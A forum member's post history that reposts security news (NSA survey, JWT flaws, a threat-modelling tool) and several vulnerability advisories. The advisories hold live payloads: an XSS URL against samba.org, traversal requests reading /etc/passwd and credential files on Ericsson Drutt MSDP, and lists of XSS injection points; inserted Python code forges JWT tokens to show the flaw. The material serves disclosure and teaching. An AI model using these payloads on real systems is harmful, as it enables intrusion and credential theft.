Aerosol

Active Members
Posts: 3453
Days Won: 22

Everything posted by Aerosol

  1. Some 30 percent of American adults say they have altered their digital behavior in the wake of Edward Snowden’s NSA spying revelations in order to hide information from the government. In Spring 2013, Snowden, a then NSA contractor working for Booz Allen Hamilton, remotely accessed the NSA’s Ft. Meade networks from a satellite office on Hawaii and stole a massive trove of secret documents detailing the U.S. signals intelligence agency’s extensive surveillance capabilities and spying operations. Nearly two years after the initial release, Snowden, now exiled in Russia, is still publishing new revelatory documents about the NSA and its partners’ activities.

The Pew Research Center conducted a survey, seeking to determine the extent to which these revelations have changed the way people communicate and behave online, as well as people’s approval of and opinions about surveillance. In all, 87 percent of respondents were aware of the NSA’s spying operations to some extent. Among those, 34 percent had actively changed their online behavior. That group accounted for 30 percent of the entire research sample, which consisted of 475 randomly selected adults.

In nearly every scenario tested, younger adults were more likely to have disapproved of spying and made changes in light of the revelations. Men were more likely to have heard more about surveillance than women, and college graduates more likely than people with only a high school diploma or less. In general, the more informed the respondent was about government surveillance, the more likely that person was to either disapprove of spying or change online behavior because of it.

Specifically, 17 percent of respondents changed the privacy settings on their social media accounts, 15 percent reported using social media less often, 15 percent said they’ve avoided certain mobile applications and 13 percent have uninstalled apps. In addition, 14 percent claimed they speak more in person instead of communicating online or via phone, and 13 percent have avoided using certain terms in online communications. Anecdotally, many respondents reported self-censoring online to avoid communicating about or searching for information that could be deemed threatening, even when such searches were merely out of curiosity and such conversations were in jest.

Numerically speaking, 18 percent claim to have changed the way they send emails, 17 percent reported changes in search behavior, 15 percent said they changed social networking tendencies and 15 percent say they are using their cell phones differently. A quarter of those who were aware of NSA surveillance reported having deployed more complicated passwords as a result.

More than half of those surveyed, 57 percent to be exact, say it is “unacceptable” for the government to monitor the communications of U.S. citizens. Not surprisingly, if you’ve been following the revelations, Americans are comfortable with their government targeting foreigners for surveillance, but not themselves. However, most respondents said they are losing confidence that the public interest is being served by surveillance programs. The public is evenly split about the capacity of the judicial system to balance privacy rights with intelligence needs. Specifically, 82 percent believe it is acceptable to monitor communications of suspected terrorists, 60 percent believe it is acceptable to monitor the communications of American leaders, another 60 percent think it is okay to monitor the communications of foreign leaders, 54 percent say it is acceptable to monitor communications from foreign citizens and only 40 percent feel it is okay for the government to monitor ordinary U.S. citizens.

Respondents were more accepting of surveillance when they were asked about its use in specific scenarios such as monitoring people who have visited sites containing child pornography or anti-American sentiments, those who had communicated with “an imam who preached against infidels,” those who used search engines to research weapons and explosives, made unusual banking withdrawals, used encryption to hide files, and people who follow others on social media who say hateful things about American leaders.

Just 10 percent of respondents say they have used an alternative search engine that does not track search history. Only five percent have added privacy-enhancing browser plug-ins. Four percent have adopted mobile encryption for calls and text messages, three percent have used proxy servers that can help them avoid surveillance, two percent have adopted email encryption programs such as Pretty Good Privacy (PGP), two percent have used anonymity software such as Tor and only one percent have used locally-networked communications such as FireChat. These low adoption rates may well relate to another finding stating that more than half of respondents believe it would be too difficult to increase their security and privacy online. 53 percent have not adopted or considered using a search engine that doesn’t keep track of a user’s search history and another 13 percent said they don’t even know about these tools. 46 percent have not adopted or considered using email encryption programs and another 31 percent said they didn’t know such things existed. 43 percent have not adopted or considered adding privacy-enhancing browser plug-ins while 31 percent did not know about these plug-ins. 41 percent haven’t adopted or considered using proxies, with an additional 33 percent having no awareness of them. And 40 percent have not adopted or considered using anonymity software such as Tor while another 39 percent don’t even know about Tor.

Source
  2. Critical vulnerabilities exist in several JSON Web Token (JWT) libraries – namely the JavaScript and PHP versions – that could let an attacker bypass the verification step. Tim McLean, a Canadian security researcher who specializes in cryptography and dug up the issues, points out that attackers could exploit one of those vulnerabilities, which abuses an asymmetric signing algorithm, in some JWT libraries.

Introduced a few years back, JWT is a standard that produces tokens between two parties. For example, a server can produce an admin token, transferred in JSON, signed by the server’s key. Clients can go on to use that token to verify the user is logged in as an admin.

The issue revolves around a public key confusion between systems signed with the hash function HMAC and those signed with RSA. “If a server is expecting a token signed with RSA, but actually receives a token signed with HMAC, it will think the public key is actually an HMAC key,” McLean explained in a blog post Tuesday. “How is this a disaster? HMAC secret keys are supposed to be kept private, while private keys are, well, public.” In this scenario, if an attacker got access to a public key through an API in some JWT libraries, they could use it as a token and the server would accept it.

McLean advises anyone who runs a JWT implementation to verify that tokens with different signatures are set up to be rejected, either via a whitelisting or blacklisting mechanism. “The server should already know what algorithm it uses to sign tokens, and it’s not safe to allow attackers to provide this value.”

A separate issue, since fixed in many JWT libraries, previously let attackers choose the way tokens are verified, a condition that had “disastrous implications for some implementations,” according to McLean. McLean initially blogged about the issue in February and elaborated further on the issue this week. OAuth, one of the more popular standards for authorization, found his research so important that it republished the work on its own blog yesterday.

This issue is rooted in the way that some libraries handled an algorithm known as “none.” Tokens signed with “none” could have been acknowledged as valid tokens with valid signatures, according to McLean. Attackers could modify tokens and sign them with “none” instead of HMAC-SHA256, or HS256. The tokens would then appear “signed.” Attackers then could have gone on to attach their own payload to gain arbitrary account access on some systems. According to McLean, most libraries have fixed the “none” issue by ensuring that token verification fails any tokens that use the “none” algorithm.

In order to fix the asymmetric keys issue, McLean, with the help of Auth0, got in touch with several of the libraries’ authors to make sure that any tokens with a different signature type are rejected by their libraries. Since JWTs can work across several languages, .NET, Node.js, Python, PHP, Java, Ruby, to name a few, there were a handful of libraries to contact about the vulnerability. Auth0 fixed the issue in its Node.js library last Thursday and is encouraging users to upgrade to 4.2.2, the latest version. Jose Padilla, who maintains the Python build of the library, fixed the signature verification vulnerability in version 1.0.0 last month by adding support for an alg whitelist. The most recent version, 1.0.1, also includes the fix. According to jwt.io, a service run by Auth0, the PHP and JavaScript versions of the libraries remain vulnerable. Auth0 is instructing those who run those versions of JWT to seek out another non-vulnerable library until the issues are fixed or verified.

Source
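The two verifier defects the post describes, accepting the "none" algorithm and treating a configured RSA public key as an HMAC secret, shown as an added example that is not part of the post or of any JWT library: a minimal verifier that trusts the token's own "alg" header beside one that pins the algorithm the server signs with. The keys, claims and the public-key placeholder are constructed; RS256 signature checking itself is left out because the defect is in the algorithm dispatch, not in RSA.

```python
# Added example (not from the post or any JWT library): a minimal JWT verifier
# that trusts the token's "alg" header, beside one that pins the expected alg.
# Keys, payloads and the public-key placeholder below are constructed.
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_token(payload: dict, alg: str, key: bytes = b"") -> str:
    """Build a compact JWT. With alg "none" the signature segment is empty,
    the exact shape the vulnerable libraries used to accept as "signed"."""
    header = {"typ": "JWT", "alg": alg}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    if alg == "none":
        sig = b""
    elif alg == "HS256":
        sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    else:
        raise ValueError("only HS256 and none are built in this example")
    return signing_input + "." + b64url_encode(sig)


def split_token(token: str) -> Tuple[dict, dict, bytes, bytes]:
    """Return (header, payload, signing input, raw signature)."""
    h, p, s = token.split(".")
    return (json.loads(b64url_decode(h)), json.loads(b64url_decode(p)),
            (h + "." + p).encode(), b64url_decode(s))


def hs256_ok(key: bytes, signing_input: bytes, sig: bytes) -> bool:
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


def verify_vulnerable(token: str, key: bytes) -> Optional[dict]:
    """Lets the token decide how it is verified (the pattern McLean describes).
    `key` is whatever the server configured: an HMAC secret or an RSA public key."""
    header, payload, signing_input, sig = split_token(token)
    alg = header.get("alg")
    if alg == "none":                 # bug 1: unsigned tokens pass
        return payload
    if alg == "HS256":                # bug 2: a public key becomes the HMAC secret
        return payload if hs256_ok(key, signing_input, sig) else None
    if alg == "RS256":
        raise NotImplementedError("RSA signature checking is outside this example")
    return None


def verify_hardened(token: str, key: bytes, expected_alg: str) -> Optional[dict]:
    """The server knows what it signs with; any other alg is rejected before
    key material is touched, which closes both bugs at once."""
    header, payload, signing_input, sig = split_token(token)
    if header.get("alg") != expected_alg:
        return None
    if expected_alg == "HS256":
        return payload if hs256_ok(key, signing_input, sig) else None
    if expected_alg == "RS256":
        raise NotImplementedError("RSA signature checking is outside this example")
    return None


def demo() -> dict:
    """Constructed scenario: one server signs with HS256, another with RS256."""
    secret = b"constructed-hmac-secret"
    # Placeholder for the RS256 server's public key, which anyone may know.
    public_key_pem = b"-----BEGIN PUBLIC KEY-----\nCONSTRUCTED\n-----END PUBLIC KEY-----\n"
    claims = {"sub": "attacker", "admin": True}
    forged_none = make_token(claims, "none")
    forged_hs = make_token(claims, "HS256", public_key_pem)  # public key used as MAC key
    genuine = make_token({"sub": "alice", "admin": False}, "HS256", secret)
    return {
        "vuln_accepts_none": verify_vulnerable(forged_none, secret) is not None,
        "vuln_accepts_key_confusion": verify_vulnerable(forged_hs, public_key_pem) is not None,
        "hard_rejects_none": verify_hardened(forged_none, secret, "HS256") is None,
        "hard_rejects_key_confusion": verify_hardened(forged_hs, public_key_pem, "RS256") is None,
        "hard_accepts_genuine": verify_hardened(genuine, secret, "HS256") == {"sub": "alice", "admin": False},
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```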
  3. Threat models help application developers answer some fundamental questions about potential risks and how to cut off vulnerabilities before they’re put into production. Some software development lifecycles, however, don’t include threat modeling as part of the code-building process because they’ve either never heard of it, or the process is too difficult.

Students at St. Mary’s University in Nova Scotia, Canada, participating in Mozilla’s Winter of Security 2014 project, built a browser-based threat modeling tool that simplifies visualization of systems and data flows, and where soft spots might be introduced during design. The tool, called Seasponge, has been made available on Github and its developers are hoping to not only get feedback and feature suggestions, but also hope to encourage developers to introduce threat modeling into SDLs in order to fix bugs while in design, when it’s cheap to do so.

“We hope now that it’s out there that people collaborate, build threats for it, collaborate and share files and grow a threat modeling community around Seasponge,” said Glavin Wiechert, one of the students behind the tool along with Joel Kuntz, Sarah MacDonald and Mathew Kallada. “We hope this tool is easy to start out with and will ultimately accelerate the usage of threat modeling and the number of people using threat modeling for projects.”

Wiechert, a full-time student at St. Mary’s who also runs his own analytics company, came into this project without much of a security background, other than an interest in the discipline. He and his colleagues, as well as Mozilla, hope that Seasponge ultimately has a place alongside Microsoft’s free SDL threat modeling tool, the most popular tool among developers today.

“The original idea came from Mozilla to have a tool like this,” Wiechert said. “There was a heavy demand from their users within Mozilla to use something like the Microsoft threat modeling tool, but have it be more open source and Web-based, and not be forced to be just on the Windows platform.”

Being a Web-based alternative to the Microsoft tool, the developers hope that with it now being open source, contributions can be made to help them reach their goals of adding more collaboration features, cloud-based storage for projects, encapsulation of entire systems, and more.

“One of the big eye openers for me was the lack of development, in terms of the only competition was the Microsoft tool,” Wiechert said. “No one dove into a web platform for threat modeling. I wasn’t very experienced in the field, but it is an important one. I expected more competition and a community, and we hoped to be part of it, but it was really Microsoft-centric.”

Wiechert said Mozilla is among the early beta testers and is putting Seasponge through its paces. “It’s functional and you can make new threats in the tool, open, download and save files, visualize them; all the attributes work,” he said. “It’s also functional from a visualization standpoint. I’m hoping Mozilla is using it right now and soon anyone else in the community. We’re hoping to get feedback from the threat modeling community and we’re interested to hear any ideas.”

Source
  4. Respect @wildchild, are you in, bro? It's only 100 lei, won't you give 100 lei to the girl?
  5. )) A dedication with the most damn respect. @askvrit "casa de piatra" (congratulations on the wedding), old man.
  6. @robertutzu I just posted the link.
  7. # Affected software: phplist
# Type of vulnerability: insecure object reference
# URL: phplist.com
# Discovered by: Provensec
# Website: http://www.provensec.com
# Version: phpList ltd. - v3.0.10
# Proof of concept
Insecure object reference on the page deletion function.
Vulnerable param: delete
Example: http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99
Ref: https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29

Source
  8. ######################################################################
# Exploit Title: Samba.org and OpenLDAP.org Reflected XSS
# Date: 02/04/2015
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.samba.org & www.openldap.org
# Version: /
# Category: Reflected Cross Site Scripting
# Google dork:
# Tested on: Samba.org and OpenLDAP.org main domains
######################################################################

Samba description :
======================================================================
Samba is a free software re-implementation of the SMB/CIFS networking protocol, and was originally developed by Andrew Tridgell. Samba provides file and print services for various Windows clients and can integrate with a Windows Server domain, either as a Domain Controller (DC) or as a domain member. As of version 4, it supports Active Directory and Windows NT domains.
www.samba.org is the main domain of the project.

OpenLDAP description :
======================================================================
OpenLDAP is a free, open source implementation of the Lightweight Directory Access Protocol (LDAP) developed by the OpenLDAP Project. It is released under its own BSD-style license called the OpenLDAP Public License.
www.openldap.org is the main domain of the project.

JitterBug project description :
======================================================================
JitterBug is a web based bug tracking system. It was originally developed by Andrew Tridgell to handle bug tracking, problem reports and queries from Samba users. It is now available under the GNU General Public License in the hope that it will be useful for other projects. JitterBug operates by receiving bug reports via email or a web form. Authenticated users can then reply to the message, move it between different categories or add notes to it. In some ways JitterBug is like a communal web based email system. This web page is itself a JitterBug page. You can get an idea of what JitterBug can do by playing with the various links and buttons.
JitterBug was used by many other open-source projects like Gnome, rsync, The Gimp, linux-patches, ProFTPD, Willows, Java Linux, WindowMaker, mod_ssl, GnuCash or OpenLdap. Only OpenLDAP and Samba use it currently, so they are both impacted by the vulnerability described here.

RXSS Vulnerability description - PoC :
======================================================================
A reflected XSS is available in the JitterBug bug tracking project provided on the samba.org and openldap.org websites. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Samba/OpenLDAP portals, or capture Samba (OpenLDAP) users' credentials such as cookies. It's also possible to forge a fake page with this XSS to provide a backdoored version of software to users.
This reflected XSS is on the GET "id" variable, which is not properly sanitized before being used in the page.
Tested on Firefox 35.0.

PoC:
http://www.samba.org/cgi-bin/jitterbug/CVS?id=1337</TITLE><img src=x onerror="alert(/Reflected XSS - Yann CAM @asafety/)" /><TITLE>;selectid=1337

JitterBug future :
======================================================================
As indicated by Samba:
The JitterBug project is no longer being actively maintained. Jitterbug has known unfixed security vulnerabilities. Unless you know exactly what you are doing, you should not use it any more. If you wish to take over as the maintainer then please contact Andrew Tridgell at jitterbug@tridgell.net

A possible patch is to sanitize each call, in the jitterbug.c file, of:
void print_title(char *fmt, ...)
which injects GET vars directly into the generated HTML source:
print_title("%s - %s/%s", lp_title(), directory, cgi_variable("id"));
In the cgi.c file, there is a potential function to escape all dangerous chars:
char *urlquote(char *s)

Screenshots :
======================================================================
- http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_001.png
- http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_002.png
- http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_001.png
- http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_002.png

Solution:
======================================================================
Fixed by OpenLDAP team (no details)
JitterBug is no longer maintained on Samba website.
Thanks to both teams, Samba and OpenLDAP, for their kindness and responsiveness.

Additional resources :
======================================================================
- https://www.samba.org/jitterbug/
- http://www.openldap.org/its/index.cgi/Web?id=7988
- https://bugzilla.samba.org/show_bug.cgi?id=10967
- http://www.asafety.fr/vuln-exploit-poc/contribution-reflected-xss-vulnerabilites-dans-samba-org-et-openldap-org
- http://www.synetis.com

Report timeline :
======================================================================
2014-11-26 : Samba ticket created to alert team with details and PoC.
2014-11-26 : OpenLDAP ticket created to alert team with details and PoC.
2014-11-26 : OpenLDAP fixes the vulnerability.
2014-11-27 : Samba response with additional questions.
2015-03-30 : New comment to get a status.
2015-03-30 : JitterBug on Samba.org website is disabled and the project is no longer maintained.
2015-04-02 : Public advisory.

Credits :
======================================================================
www.synetis.com
Consulting firm in management and information security
Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr

Source
  9. What didn't you understand, man? A few XSS (Cross Site Scripting) vulnerabilities, and an Open Redirect (it redirects you to a link of your choosing, which can be a link that injects malicious code, etc...).
  10. Ericsson Drutt MSDP (Instance Monitor) Directory Traversal / File Access

+------------------------------------------------------------------------------------------------------+
+ Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal Vulnerability and Arbitrary File Access +
+------------------------------------------------------------------------------------------------------+

Affected Product: Ericsson Drutt MSDP (Instance Monitor)
Vendor Homepage : www.ericsson.com
Version : 4, 5 and 6
CVE v2 Vector : AV:N/AC:L/Au:N/C:P/I:N/A:N
CVE : CVE-2015-2166
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes

+-------------+
+ Description +
+-------------+
Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf.
The identified vulnerability affects the Instance Monitor component and allows an unauthenticated remote attacker to access arbitrary files on the file system.
+----------------------+
+ Exploitation Details +
+----------------------+
This vulnerability can be triggered via a simple HTTP GET request similar to the ones below:
http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt/drutt/msdp/manager/conf/props/msdp-users.properties
http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/opt/drutt/msdp/manager/conf/ccContext.properties

+---------------------+
+ Disclosure Timeline +
+---------------------+
17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback
24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office
24.Feb.2015 - Contacted Corporate Security Office team
02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel
02.Mar.2015 - Shared vulnerability details
06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches
08.Mar.2015 - Agreed on public disclosure timelines
12.Mar.2015 - Patches released
31.Mar.2015 - Public disclosure

Ericsson Drutt MSDP (Report Viewer) Cross Site Scripting

+----------------------------------------------------------------------+
+ Ericsson Drutt MSDP (Report Viewer) - Cross Site Scripting Injection +
+----------------------------------------------------------------------+

Affected Product: Ericsson Drutt MSDP (Report Viewer)
Vendor Homepage : www.ericsson.com
Version : 4, 5 and 6
CVE v2 Vector : AV:N/AC:M/Au:N/C:N/I:P/A:N
CVE : CVE-2015-2165
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]

+-------------+
+ Description +
+-------------+
Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and
services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf.
The Report Viewer component contains a vulnerability (at multiple user-supplied input points) that could allow an unauthenticated, remote attacker to execute arbitrary code in the user's browser session in the context of the affected site.

+----------------------+
+ Exploitation Details +
+----------------------+
The vulnerable input points and respective URL paths are listed below:
1. http://<drutt:port>/reports/pages/top-links.jsp?portal=[XSS]&interval=M&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=clicks&sortDirection=desc&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=&atype=[XSS]&atitle=[XSS]
2. http://<drutt:port>/reports/pages/page-summary.jsp?portal=[XSS]&uid=[XSS]
3. http://<drutt:port>/reports/pages/top-useragent-devices.jsp?portal=[XSS]
4. http://<drutt:port>/reports/pages/service-summary.jsp?portal=[XSS]&uid=[XSS]
5. http://<drutt:port>/reports/pages/top-useragent-devices.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=reqs&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
6. http://<drutt:port>/reports/pages/top-interest-areas.jsp?portal=[XSS]&interval=M&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&top=10&sortOrder=asc&orderBy=urs&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
7. http://<drutt:port>/reports/pages/top-message-services.jsp?interval=Y&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=urs&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
8. http://<drutt:port>/reports/pages/user-statistics.jsp?portal=[XSS]&interval=Y&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
9. http://<drutt:port>/reports/pages/message-shortcode-summary.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=9397[XSS]&uid2=[XSS]&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=XSS
10. http://<drutt:port>/reports/pages/message-providers-summary.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=[XSS]&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
11. http://<drutt:port>/reports/pages/license-summary.jsp?interval=D&fromDate=2015-02-11&toDate=2015-02-12&fromTime=00&toTime=00&usercategory=&orderBy=ival&sortDirection=desc&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
12. http://<drutt:port>/reports/pages/top-web-pages.jsp?portal=[XSS]&interval=M&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
13. http://<drutt:port>/reports/pages/top-devices.jsp?portal=[XSS]&interval=M&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
14. http://<drutt:port>/reports/pages/top-pages.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
15. http://<drutt:port>/reports/pages/useragent-device-summary.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=[XSS]&uid2=[XSS]&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
16. http://<drutt:port>/reports/pages/message-services-summary.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=[XSS]&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
17. http://<drutt:port>/reports/pages/top-message-providers.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
18. http://<drutt:port>/reports/pages/top-message-devices.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
19. http://<drutt:port>/reports/pages/top-message-assets.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
20. http://<drutt:port>/reports/pages/top-message-downloads.jsp?interval=M&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
21. http://<drutt:port>/reports/pages/top-message-shortcode.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
22. http://<drutt:port>/reports/pages/request-summary.jsp?interval=D&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=ival&sortDirection=desc&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
23. http://<drutt:port>/reports/pages/link-summary-select.jsp?portal=[XSS]
24. http://<drutt:port>/reports/pages/link-summary.jsp?portal=[XSS]&interval=M&fromDate=2014-02&toDate=2015-02&fromTime=17&toTime=18&usercategory=&orderBy=ival&sortDirection=desc&uid=[XSS]&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
25. http://<drutt:port>/reports/pages/session-summary.jsp?portal=[XSS]&show=a&interval=M&fromDate=2014-02[XSS]&toDate=2015-02[XSS]&fromTime=17[XSS]&toTime=18[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
26. http://<drutt:port>/reports/pages/provider-summary-select.jsp?portal=[XSS]
27. http://<drutt:port>/reports/pages/provider-summary.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=[XSS]&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
28. http://<drutt:port>/reports/pages/top-providers.jsp?portal=[XSS]
29. http://<drutt:port>/reports/pages/module-summary-select.jsp?portal=[XSS]
30. http://<drutt:port>/reports/pages/module-summary.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=[XSS]&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
31. http://<drutt:port>/reports/pages/top-providers.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
32. http://<drutt:port>/reports/pages/top-modules.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]
33. http://<drutt:port>/reports/pages/top-services.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS]

+---------------------+
+ Disclosure Timeline +
+---------------------+
